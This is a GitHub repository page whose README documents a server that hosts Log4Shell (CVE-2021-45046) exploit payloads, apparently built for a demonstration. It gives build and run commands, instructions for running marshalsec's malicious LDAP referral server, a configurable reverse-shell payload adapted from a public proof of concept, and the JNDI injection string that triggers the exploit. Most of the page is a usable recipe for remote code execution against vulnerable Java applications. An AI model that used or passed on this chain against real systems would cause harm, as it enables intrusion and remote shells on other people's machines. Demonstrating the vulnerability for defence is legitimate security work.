Skip to content

lwollan/log4j-exploit-server

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits

src/main

src/main

 
 

.gitignore

.gitignore

 
 

Procfile

Procfile

 
 

README.md

README.md

 
 

pom.xml

pom.xml

 
 

Repository files navigation

Exploit server

As part of a demonstration on how the log4j vulnerability CVE-2021-45046, a small web server was needed to provide various payloads/gadgets.

Even if the ExploitServer can server multiple exploit payloads, marshalsec can only support one per instance, as far as I have gathered. You can however run multiple instances of marshalsec.

Configuring exploits

Note that these were tested on MacOS and java8. The exploits need to be self-contained and can not depend on external classes outside what would be available on the attack target virtual machine.

Any configuration of the exploit is done during build. Properties can be changed in the properties section of the pom file.

OpenWebPage

Will open a web page using the MacOS 'open' command.

Configuring

Property Description Default value
exploit.openwebpage.targeturl Target webpage https://www.google.com

RemoteShell

This was based on the code in https://github.com/kozmer/log4j-shell-poc. Some modifications were done, but the main functionality was taken from the Exploit.java file.

Configuring

Property Description Default value
exploit.remoteshell.host Address of reverse shell proxy localhost
exploit.remoteshell.port Port of reverse shell proxy 9001

Building

The application is built using Apache Maven.

$> mvn clean install

Running server

From maven

$> mvn exec:exec

As standalone jar file

$> java -jar target/log4j-exploit-server-0.0.1-SNAPSHOT.jar

Verify that server is running

$> curl http://localhost:8000/OpenWebPage.class --output -

Running marshalsec

Assuming maven and java is installed you can execute the following commands:

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

Then you can choose which exploit to server on the ldap server:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage

or

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell

or even both

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage 10000
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell 10001

Attack URLS

${jndi:ldap://<marshalsec host>:<marshalsec port>/a}

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages